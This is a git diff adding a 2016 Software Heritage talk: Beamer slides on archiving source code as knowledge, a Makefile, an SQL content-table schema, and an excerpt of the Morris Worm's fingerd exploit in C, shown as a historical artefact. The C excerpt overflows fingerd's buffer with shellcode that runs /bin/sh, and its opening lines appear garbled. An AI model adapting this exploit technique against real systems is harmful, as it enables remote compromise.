diff --git a/talks-public/2016-12-01-mfglabs/2016-12-01-mfglabs.org b/talks-public/2016-12-01-mfglabs/2016-12-01-mfglabs.org new file mode 100644 index 0000000..b4c998f --- /dev/null +++ b/talks-public/2016-12-01-mfglabs/2016-12-01-mfglabs.org @@ -0,0 +1,151 @@ +#+COLUMNS: %40ITEM %10BEAMER_env(Env) %9BEAMER_envargs(Env Args) %10BEAMER_act(Act) %4BEAMER_col(Col) %10BEAMER_extra(Extra) %8BEAMER_opt(Opt) +#+TITLE: Software Heritage: the Universal Archive of our Software Commons +# does not allow short title, so we override it for beamer as follows : +#+BEAMER_HEADER: \title[Software Heritage]{Software Heritage\\the Universal Archive of our Software Commons} +#+BEAMER_HEADER: \author{Nicolas Dandrimont} +#+BEAMER_HEADER: \date[01/12/2016, MFG Labs]{01 December 2016\\MFG Labs\\Paris, France} +#+AUTHOR: Nicolas Dandrimont +#+DATE: 01 December 2016 +#+EMAIL: olasd@softwareheritage.org +#+DESCRIPTION: Software Heritage: the Universal Archive of our Software Commons +#+KEYWORDS: software heritage legacy preservation knowledge mankind technology + +#+INCLUDE: "../../common/modules/prelude.org" :minlevel 1 +#+BEAMER_HEADER: \institute[Software Heritage]{Software Heritage\\\href{mailto:olasd@softwareheritage.org}{\tt olasd@softwareheritage.org}} + +#+LATEX_HEADER: \usepackage{listings} + +* Software as knowledge +** + # Apollo 11 source code (excerpt) + #+BEAMER: \begin{center}\includegraphics[width=\textwidth]{apollo-11-source-code}\end{center} + #+BEAMER: {\tiny code by Margaret Hamilton and her NASA team, \url{http://www.ibiblio.org/apollo/}} +** + # Morris Worm source code (excerpt) + #+BEAMER: \lstinputlisting[language=C,basicstyle=\footnotesize,linerange={1-12}]{source/morris-worm-hs.c} + #+BEAMER: /* ... */ + #+BEAMER: \lstinputlisting[language=C,basicstyle=\footnotesize,linerange={44-49}]{source/morris-worm-hs.c} + #+BEAMER: {\tiny \url{https://github.com/arialdomartini/morris-worm}}\ +** Source code is knowledge + # #+INCLUDE: "../../common/modules/software-all-around-us.org::#softwareisdifferent" :only-contents t + #+LATEX: \includegraphics[width=\extblockscale{.15\linewidth}]{software.png} +#+BEGIN_QUOTE + “Programs must be written for people to read, and only incidentally for machines to execute.” + --- Harold Abelson +#+END_QUOTE +*** Distinguishing features + - *executable* and *human readable* knowledge (an /all time new/) + - naturally *evolves* over time + + development history is key to its understanding + - complex: large web of *dependencies*, millions of SLOCs +** The Software Commons + #+INCLUDE: "../../common/modules/foss-commons.org::#commonsdef" :only-contents t +** The speed of /our/ knowledge production is increasing :noexport: +*** ... due to software pervasiveness :B_picblock: + :PROPERTIES: + :BEAMER_opt: pic=software-center.pdf, leftpic=true, width=.4\linewidth + :BEAMER_env: picblock + :END: + #+ATTR_BEAMER: :environment itemize + - communication, entertainment + - administration, finance + - health, energy, transportation + - education, research, politics + - ... +*** ... due to software sheer volume :B_picblock: + :PROPERTIES: + :BEAMER_opt: pic=pervasiveComputing + :BEAMER_env: picblock + :BEAMER_act: +- + :END: + #+ATTR_BEAMER: :environment itemize + - house appliances $\approx$ 10M SLOC + - phones $\approx$ 20M SLOC, /cars/ $\approx$ 100M SLOC + - IoT + - ... +* Software is fragile + #+INCLUDE: "../../common/modules/swh-motivations.org::#spread" + #+INCLUDE: "../../common/modules/swh-motivations.org::#fragile" +* The Software Heritage project +** The Software Heritage project + #+INCLUDE: "../../common/modules/swh-overview-sourcecode.org::#missionshort" :only-contents t +** Our principles + #+latex: \begin{center} + #+ATTR_LATEX: :width .9\linewidth + file:SWH-as-foundation-slim.png + #+latex: \end{center} +*** Open approach :B_block:BMCOL: + :PROPERTIES: + :BEAMER_col: 0.4 + :BEAMER_env: block + :END: + - 100% FOSS + - transparency +*** In for the long haul :B_block:BMCOL: + :PROPERTIES: + :BEAMER_col: 0.4 + :BEAMER_env: block + :END: + - replication + - non profit +** Archiving goals + Targets: VCS repositories & source code releases (e.g., tarballs) +*** We DO archive + - file *content* (= blobs) + - *revisions* (= commits), with full metadata + - *releases* (= tags), ditto + - (project metadata) + - *where & when* we found any of the above + # - time-indexed repo *snapshots* (i.e., we never delete anything) + … in a VCS-/archive-agnostic *canonical data model* +*** We DON'T archive (UNIX philosophy) + # - diffs → derived data from related contents + - homepages, wikis → collaboration with the Internet Archive + - BTS/issues/code reviews/etc. + - mailing lists + Long term vision: play our part in a /"semantic wikipedia of software"/ +* Technical overview + #+INCLUDE: "../../common/modules/status-extended.org::#architecture" :only-contents t + #+INCLUDE: "../../common/modules/status-extended.org::#merkletree" :minlevel 2 + #+INCLUDE: "../../common/modules/status-extended.org::#giantdag" :only-contents t +** SHA1 collisions considered harmful + #+BEAMER: \lstinputlisting[language=SQL,basicstyle=\small]{source/swh-content.sql} + #+INCLUDE: "../../common/modules/status-extended.org::#archive" :minlevel 2 + #+INCLUDE: "../../common/modules/status-extended.org::#features" :minlevel 2 +* Conclusion + # #+INCLUDE: "../../common/modules/status-extended.org::#people" :minlevel 2 +** An ambitious, worldwide initiative +*** Inria as initiator :B_picblock: + :PROPERTIES: + :BEAMER_env: picblock + :BEAMER_opt: pic=inria-logo-new,leftpic=true,width=\extblockscale{.4\linewidth} + :END: + - .fr national CS research institution + - strong FOSS culture + - founding partner of the W3C + # - creating a non profit, international organisation + #+BEAMER: \pause +*** Supporters and /early partners/ + ACM, *Nokia Bell Labs*, Creative Commons, *DANS*, Eclipse, Engineering, + FSF, OSI, GitHub, GitLab, IEEE, Informatics Europe, *Microsoft*, OIN, OW2, + SIF, SFC, SFLC, The Document Foundation, The Linux Foundation, ... + #+BEAMER: \pause +*** Going global + building an /open, multistakeholder, nonprofit/ global organisation +** Conclusion +*** Software Heritage is + - a revolutionary /reference archive/ of /all/ FOSS ever written + # - a fantastic new tool for /research/ software + - a unique /complement/ for /development platforms/ + - an international, open, nonprofit, /mutualized infrastructure/ + - at the service of our community, at the service of society! +*** Come in, we're open! + \url{www.softwareheritage.org} --- /sponsoring/, /*job openings*/ \\ + \url{wiki.softwareheritage.org} --- /*internships*/, /leads/ \\ + \url{forge.softwareheritage.org} --- /*our own code*/ + #+BEAMER: \vfill \flushright {\Huge Questions?} \vfill +* Appendix :B_appendix:noexport: + :PROPERTIES: + :BEAMER_env: appendix + :END: + #+INCLUDE: "../../common/modules/status-extended.org::#merkledemo" :only-contents t diff --git a/talks-public/2016-12-01-mfglabs/Makefile b/talks-public/2016-12-01-mfglabs/Makefile new file mode 100644 index 0000000..68fbee7 --- /dev/null +++ b/talks-public/2016-12-01-mfglabs/Makefile @@ -0,0 +1 @@ +include ../Makefile.slides diff --git a/talks-public/2016-12-01-mfglabs/source/morris-worm-hs.c b/talks-public/2016-12-01-mfglabs/source/morris-worm-hs.c new file mode 100644 index 0000000..23e8e1d --- /dev/null +++ b/talks-public/2016-12-01-mfglabs/source/morris-worm-hs.c @@ -0,0 +1,79 @@ +/* This routine exploits a fixed 512 byte input buffer in a + * VAX running the BSD 4.3 fingerd binary. It send 536 + * bytes (plus a newline) to overwrite six extra words in + * the stack frame, including the return PC, to point into + * the middle of the string sent over. The instructions in + * the string do the direct system call version of + * execve("/bin/sh"). */ + +static try_finger(host, fd1, fd2) /* 0x49ec,o48[i] == 0) + continue; /* 600 */ + s = socket(AF_INET, SOCK_STREAM, 0); + if (s < 0) + continue; + bzero(&sin, sizeof(sin)); + sin.sin_family = AF_INET; + sin.sin_addr.s_addr = host->o48[i]; + sin.sin_port = IPPORT_FINGER; + + alarm(10); + if (connect(s, &sin, sizeof(sin)) < 0) { + alarm(0); + close(s); + continue; + } + alarm(0); + break; + } + if (i >= 6) + return 0; /* 978 */ + for(i = 0; i < 536; i++) /* 628,654 */ + buf[i] = '\0'; + for(i = 0; i < 400; i++) + buf[i] = 1; + for(j = 0; j < 28; j++) + buf[i+j] = "\335\217/sh\0\335\217/bin\320^Z\335\0\335\0\335Z\335\003\320^\\\274;\344\371\344\342\241\256\343\350\357\256\362\351"[j]; + /* constant string x200a0 */ + + /* 0xdd8f2f73,0x6800dd8f,0x2f62696e,0xd05e5add,0x00dd00dd,0x5add03d0,0x5e5cbc3b */ + /* "\335\217/sh\0\335\217/bin\320^Z\335\0\335\0\335Z\335\003\320^\\\274;\344\371\344\342\241\256\343\350\357\256\362\351"... */ + + l556 = 0x7fffe9fc; /* Rewrite part of the stack frame */ + l560 = 0x7fffe8a8; + l564 = 0x7fffe8bc; + l568 = 0x28000000; + l552 = 0x0001c020; + +#ifdef sun + l556 = byte_swap(l556); /* Reverse the word order for the */ + l560 = byte_swap(l560); /* VAX (only Suns have to do this) */ + l564 = byte_swap(l564); + l568 = byte_swap(l568); + l552 = byte_swap(l552); +#endif sun + + write(s, buf, sizeof(buf)); /* sizeof == 536 */ + write(s, XS("\n"), 1); + sleep(5); + if (test_connection(s, s, 10)) { + *fd1 = s; + *fd2 = s; + return 1; + } + close(s); + return 0; +} diff --git a/talks-public/2016-12-01-mfglabs/source/swh-content.sql b/talks-public/2016-12-01-mfglabs/source/swh-content.sql new file mode 100644 index 0000000..626928f --- /dev/null +++ b/talks-public/2016-12-01-mfglabs/source/swh-content.sql @@ -0,0 +1,19 @@ +create domain sha1 as bytea + check (length(value) = 20); +create domain sha1_git as bytea + check (length(value) = 20); +create domain sha256 as bytea + check (length(value) = 32); + +create table content ( + sha1 sha1 primary key, + sha1_git sha1_git not null, + sha256 sha256 not null, + length bigint not null, + ctime timestamptz not null default now(), + status content_status not null default 'visible', + object_id bigserial +); + +create unique index on content(sha1_git); +create unique index on content(sha256);